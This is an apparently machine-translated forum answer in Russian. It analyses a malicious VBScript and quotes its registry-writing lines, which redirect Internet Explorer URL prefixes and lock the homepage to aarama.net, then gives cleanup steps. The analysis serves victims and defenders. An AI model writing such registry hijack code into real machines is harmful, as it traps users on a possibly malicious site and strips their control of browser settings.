Я не говорю много сценария, но намерения этого, кажется, в основном ясно.
Set shell = CreateObject("WScript.Shell")
первая строка, я не совсем уверен. Тем не менее, некоторые Google, похоже, подтверждают мои мысли о том, что это довольно стандартная начальная строка для сценария.
остальные строки, как представляется, установка различных разделов реестра.
shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\mirc","http://aarama.net/","REG_SZ"
этот добавляет новый префикс URL-адреса в Internet Explorer. По сути, в любое время IE запрашивает ресурс, начинающийся с "mirc."и протокол не указан, в него вставим"http://aarama.net/ " перед адресом перед его обработкой. Так что, если бы вы печатали "mirc.google.com" в адресную строку, т. е. перевел бы его на"http://aarama.net/mirc.google.com". Это, вероятно, помогает некоторым другим скриптам на вредоносном сайте (или загруженным вредоносным программам) функционировать.
shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage","00000001","REG_DWORD"
добавить разделы реестра, которые обычно реализуют управление групповой политикой обозреватель Internet Explorer. Вы можете обнаружить, что вы больше не можете изменить вашу домашнюю страницу IE через Панель управления.
shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page", "http://aarama.net/","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page", "http://aarama.net/","REG_SZ"
эти поставили"http://aarama.net/ " на вашу домашнюю страницу-гарантируя, что вы зайдете на сайт хотя бы один раз, и у вас будет возможность стать жертвой любого фишингового мошенничества или вредоносного кода. Конечно, более ранние ключи будут убедиться, что вы не просто пойти один раз, так как вы не можете изменить домашнюю страницу.
self.Close
опять же, я не на самом деле говорить сценария. Но я думаю, что на этом все закончится.
некоторые вещи, которые вы должны сделать с этой информацией:
1.) (Слишком Поздно)не заходите на этот сайт.
2.) Имейте несколько хороших антивирусных / антивирусных программ, копающихся в вашей машине. Мои рекомендации Avast! сканирование во время загрузки, Malwarebytes и Spybot Search & Destroy. Если возможный, используйте отдельную, известный-хорошую, устранимую машину для того чтобы сделать сканирования. Или получите хороший LiveCD для сканирования.
3.) Проверьте реестр на наличие значений, созданных сценарием. Если они еще есть, резервную копию реестра, а затем удалить созданные значения или изменения их настроек. Первые три должны быть просто выброшены. Последние два, установите по своему усмотрению или "о: пустой".
4.) Если вы заметили какую-либо подозрительную активность в вашей системе после этого, пришло время для подхода "nuke from orbit". Надеюсь, у вас есть хорошая резервная копия.
Komp
3442
